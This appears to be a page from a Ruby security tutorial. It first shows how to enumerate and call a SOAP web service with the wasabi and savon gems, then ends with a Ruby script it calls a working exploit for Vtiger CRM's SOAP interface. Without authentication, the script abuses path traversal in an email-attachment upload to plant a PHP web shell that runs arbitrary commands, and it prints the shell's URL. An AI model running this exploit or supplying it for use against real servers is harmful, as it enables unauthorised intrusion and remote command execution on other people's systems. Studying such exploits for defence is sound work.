Interacting with Web Services

SOAP - WSDL

Generally speaking, dealing with SOAP means dealing with XML messages and a WSDL file (also XML) that describes how to use a given SOAP API. Ruby has really elegant way to do so and let's to get our hand dirty with an exploit
  • Install wasabi, sabvon & httpclient gems
    1
    gem install wasabi savon httpclient
    Copied!

Enumeration

1
require 'wasabi'
2
3
url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"
4
5
document = Wasabi.document url
6
7
# Parsing the document
8
document.parser
9
10
# SOAP XML
11
document.xml
12
13
# Getting the endpoint
14
document.endpoint
15
16
# Getting the target namespace
17
document.namespace
18
19
# Enumerate all the SOAP operations/actions
20
document.operations
21
22
# Enumerate input parameters for particular operation
23
document.operation_input_parameters :conversion_rate
24
25
# Enumerate all available currencies
26
document.parser.document.element_children.children[1].children[1].children[3].children[1].children.map {|c| c.attributes.values[0].to_s}
Copied!
Results
1
>> url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"
2
=> "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"
3
>> document = Wasabi.document url
4
=> #<Wasabi::Document:0x00000002c79a50 @adapter=nil, @document="http://www.webservicex.net/CurrencyConvertor.asmx?WSDL">
5
>> # Parsing the document
6
>> document.parser
7
=> #<Wasabi::Parser:0x0000000281ebb8
8
@deferred_types=[],
9
@document=
10
#(Document:0x140fa3c {
11
name = "document",
12
children = [
13
#(Element:0x140f294 {
14
name = "definitions",
15
namespace = #(Namespace:0x14017e8 { prefix = "wsdl", href = "http://schemas.xmlsoap.org/wsdl/" }),
16
attributes = [ #(Attr:0x1a507d4 { name = "targetNamespace", value = "http://www.webserviceX.NET/" })],
17
children = [
18
#(Text "\n "),
19
---kipped---
20
>> # Getting the endpoint
21
>> document.endpoint
22
=> #<URI::HTTP http://www.webservicex.net/CurrencyConvertor.asmx>
23
>> # Getting the target namespace
24
>> document.namespace
25
=> "http://www.webserviceX.NET/"
26
>> # Enumerate all the SOAP operations/actions
27
>> document.operations
28
=> {:conversion_rate=>
29
{:action=>"http://www.webserviceX.NET/ConversionRate",
30
:input=>"ConversionRate",
31
:output=>"ConversionRateResponse",
32
:namespace_identifier=>"tns",
33
:parameters=>{:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}}}
34
>> # Enumerate input parameters for particular operation
35
>> document.operation_input_parameters :conversion_rate
36
=> {:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}
Copied!

Interaction

1
require 'savon'
2
3
url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"
4
client = Savon.client(wsdl: url)
5
6
message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}
7
response = client.call(:conversion_rate, message: message).body
8
9
response[:conversion_rate_response][:conversion_rate_result]
Copied!
Results
1
>> message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}
2
=> {"FromCurrency"=>"EUR", "ToCurrency"=>"CAD"}
3
>> response = client.call(:conversion_rate, message: message).body
4
=> {:conversion_rate_response=>{:conversion_rate_result=>"1.4417", :@xmlns=>"http://www.webserviceX.NET/"}}
5
6
1.4415
Copied!

Hacking via SOAP vulnerabilities

This is a working exploit for Vtiger CRM SOAP from auth-bypass to shell upload
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
# gem install savon httpclient
4
#
5
require 'savon'
6
7
if ARGV.size < 1
8
puts "[+] ruby #{__FILE__} [WSDL URL]"
9
exit 0
10
else
11
url = ARGV[0]
12
end
13
14
shell_data, shell_name = "<?php system($_GET['cmd']); ?>", "shell-#{rand(100)}.php"
15
16
# Start client
17
client = Savon::Client.new(wsdl: url)
18
19
# List all available operations
20
puts "[*] List all available operations "
21
puts client.operations
22
23
puts "\n\n[*] Interact with :add_email_attachment operation"
24
response = client.call( :add_email_attachment,
25
message: {
26
emailid: rand(100),
27
filedata: [shell_data].pack("m0"),
28
filename: "../../../../../../#{shell_name}",
29
filesize: shell_data.size,
30
filetype: "php",
31
username: "KING",
32
sessionid: nil
33
}
34
)
35
puts "[+] PHP Shell on: http://#{URI.parse(url).host}/vtigercrm/soap/#{shell_name}?cmd=id"
Copied!
More about Savon
Last modified 3yr ago